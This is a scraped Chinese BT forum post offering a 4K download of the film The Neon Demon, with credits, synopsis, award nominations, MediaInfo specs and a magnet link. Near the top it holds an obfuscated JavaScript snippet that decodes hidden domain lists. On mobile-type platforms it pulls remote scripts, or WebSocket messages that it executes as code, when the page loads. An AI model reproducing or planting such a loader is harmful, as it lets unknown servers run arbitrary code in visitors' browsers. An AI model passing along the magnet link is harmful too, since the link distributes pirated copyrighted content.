霓虹恶魔[英语音轨/中文字幕].The.Neon.Demon.2016.2160p.4K迅雷下载 18.59GB

版主小s 1月前 199

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 霓虹恶魔 / Neon démon

◎片 名 The Neon Demon

◎年 代 2016

◎产 地 法国 / 丹麦 / 美国

◎类 别 剧情 / 惊悚

◎语 言 英语

◎上映日期 2016-05-20(戛纳电影节) / 2016-06-08(法国) / 2016-06-24(美国)

◎IMDb链接 https://www.imdb.com/title/tt1974419/

◎豆瓣评分 6.3/10 (21526人评价)

◎豆瓣链接 https://movie.douban.com/subject/6860147/

◎片 长 117分钟

◎导 演 尼古拉斯·温丁·雷弗恩 Nicolas Winding Refn (id:1027335)

◎编 剧 尼古拉斯·温丁·雷弗恩 Nicolas Winding Refn (id:1027335)

波莉·斯滕纳姆 Polly Stenham (id:1357687)

玛丽·罗斯 Mary Laws (id:1357686)

◎演 员 艾丽·范宁 Elle Fanning (id:1025133)

阿比·丽 Abbey Lee (id:1262105)

贝拉·希思科特 Bella Heathcote (id:1316911)

吉娜·马隆 Jena Malone (id:1040982)

卡尔·格洛斯曼 Karl Glusman (id:1349161)

戴斯蒙德·哈灵顿 Desmond Harrington (id:1027190)

克里斯蒂娜·亨德里克斯 Christina Hendricks (id:1047880)

基努·里维斯 Keanu Reeves (id:1008070)

查尔斯·贝克 Charles Baker (id:1221276)

杰米·克莱顿 Jamie Clayton (id:1349878)

史迪茜·丁泽 Stacey Danger (id:1361783)

丽贝卡·达扬 Rebecca Dayan (id:1327513)

海伦·威尔森 Helen Wilson (id:1361784)

侯达·史伦塔 Houda Shretah (id:1361785)

泰勒·希尔 Taylor Hill (id:1354901)

查理兹·科顿 Charlize Cotton (id:1384356)

科迪·蕾尼·卡梅伦 Cody Renee Cameron (id:1436147)

亚历桑德罗·尼沃拉 Alessandro Nivola (id:1009310)

卡梅伦·布林克曼 Cameron Brinkman (id:1347738)

克里斯·穆托 Chris Muto (id:1252072)

丽芙·考菲克森 Liv Corfixen (id:1069865)

文森特·马拉瓦尔 Vincent Maraval (id:1338353)

尼古拉斯·温丁·雷弗恩 Nicolas Winding Refn (id:1027335)

克里夫·马丁内斯 Cliff Martinez (id:1005381)

娜塔莎·布雷尔 Natasha Braier (id:1304127)

奥斯丁·格尔 Austin Gorg (id:1368727)

埃林·贝纳赫 Erin Benach (id:1408698)

狄恩·琼斯 Dean Jones (id:1441544)

乔治娅·弗勒 Georgia Fowler (id:1373244)

Stacey Danger Stacey Danger (id:1384355)

希雅 Sia (id:1240500)

◎标 签 惊悚 / 迷幻 / 美国 / 2016 / 法国 / 恐怖 / 丹麦 / 剧情

◎简 介

美丽女孩杰茜(艾丽·范宁ElleFanning饰)是一个只身独闯洛杉矶的年轻女模特,她初次涉足花花世界,看起来懵懂无知,人畜无害。亲和的化妆师茹比(吉娜·马隆JenaMalone饰)最先接近她,并将其介绍给两个小有名气的模特琪琪(贝拉·希思科特BellaHeathcote饰)与莎拉(阿比·丽AbbeyLee饰)。杰茜如同一块蕴藏着莫大价值的璞玉,她很快得到了业内有识之士的赏识,前路充满光芒。她的美是上天的恩赐,她的美却也成为他人嫉妒乃至急于毁灭的脆弱之花。

T台之上,霓虹交错,杰茜逐渐趋向梦的彼岸,然则肆无忌惮膨胀的欲望与嫉恨也正将她吞没……

◎获奖情况 (共6项)

第69届戛纳电影节 (2016)

主竞赛单元 金棕榈奖(提名)

└──尼古拉斯·温丁·雷弗恩 (id:1027335)

同志金棕榈奖(提名)

└──尼古拉斯·温丁·雷弗恩 (id:1027335)

第15届华盛顿影评人协会奖 (2016)

最佳原创配乐(提名)

第29届芝加哥影评人协会奖 (2016)

最佳原创配乐(提名)

└──克里夫·马丁内斯 (id:1005381)

最佳艺术指导(提名)

第20届美国在线影评人协会奖 (2017)

最佳摄影(提名)

└──娜塔莎·布雷尔 (id:1304127)

  1. General

  2. Unique ID : 292054704525309934550432100397602663863 (0xDBB7B0A95FCF6015A064E530AC016DB7)

  3. Complete name : The.Neon.Demon.2016.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 18.6 GiB

  7. Duration : 1 h 57 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 22.7 Mb/s

  10. Movie name : The Neon Demon 2016 2160p HDR UHD BluRay DTS-HD MA 5.1 x265-10bit-HDS

  11. Encoded date : UTC 2021-06-13 03:17:05

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 57 min

  22. Bit rate : 20.9 Mb/s

  23. Width : 3 840 pixels

  24. Height : 2 160 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.105

  32. Stream size : 17.1 GiB (92%)

  33. Title : [email protected]

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio

  46. ID : 2

  47. Format : DTS XLL

  48. Format/Info : Digital Theater Systems

  49. Commercial name : DTS-HD Master Audio

  50. Codec ID : A_DTS

  51. Duration : 1 h 57 min

  52. Bit rate mode : Variable

  53. Bit rate : 1 769 kb/s

  54. Channel(s) : 6 channels

  55. Channel layout : C L R Ls Rs LFE

  56. Sampling rate : 48.0 kHz

  57. Frame rate : 93.750 FPS (512 SPF)

  58. Bit depth : 16 bits

  59. Compression mode : Lossless

  60. Stream size : 1.45 GiB (8%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No


  65. Text #1

  66. ID : 3

  67. Format : PGS

  68. Muxing mode : zlib

  69. Codec ID : S_HDMV/PGS

  70. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  71. Duration : 1 h 46 min

  72. Bit rate : 10.6 kb/s

  73. Count of elements : 1087

  74. Stream size : 8.10 MiB (0%)

  75. Title : CHS

  76. Language : Chinese

  77. Default : Yes

  78. Forced : No


  79. Text #2

  80. ID : 4

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 46 min

  86. Bit rate : 10.8 kb/s

  87. Count of elements : 1087

  88. Stream size : 8.25 MiB (0%)

  89. Title : CHT

  90. Language : Chinese

  91. Default : No

  92. Forced : No


  93. Text #3

  94. ID : 5

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 46 min

  100. Bit rate : 19.0 kb/s

  101. Count of elements : 1087

  102. Stream size : 14.5 MiB (0%)

  103. Title : CHS&ENG

  104. Language : Chinese

  105. Default : No

  106. Forced : No


  107. Text #4

  108. ID : 6

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 46 min

  114. Bit rate : 19.3 kb/s

  115. Count of elements : 1087

  116. Stream size : 14.7 MiB (0%)

  117. Title : CHT&ENG

  118. Language : Chinese

  119. Default : No

  120. Forced : No


  121. Menu

  122. 00:00:00.000 : en:Chapter 01

  123. 00:07:00.000 : en:Chapter 02

  124. 00:19:42.000 : en:Chapter 03

  125. 00:30:07.000 : en:Chapter 04

  126. 00:39:02.000 : en:Chapter 05

  127. 00:50:10.000 : en:Chapter 06

  128. 00:58:56.000 : en:Chapter 07

  129. 01:08:53.000 : en:Chapter 08

  130. 01:17:08.000 : en:Chapter 09

  131. 01:24:11.000 : en:Chapter 10

  132. 01:33:33.000 : en:Chapter 11

  133. 01:40:39.000 : en:Chapter 12


TAGS 剧情 惊悚

磁力链:
  • magnet:?xt=urn:btih:4EF18B10F2CFA47CB85741A1E042461713CCAA97
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖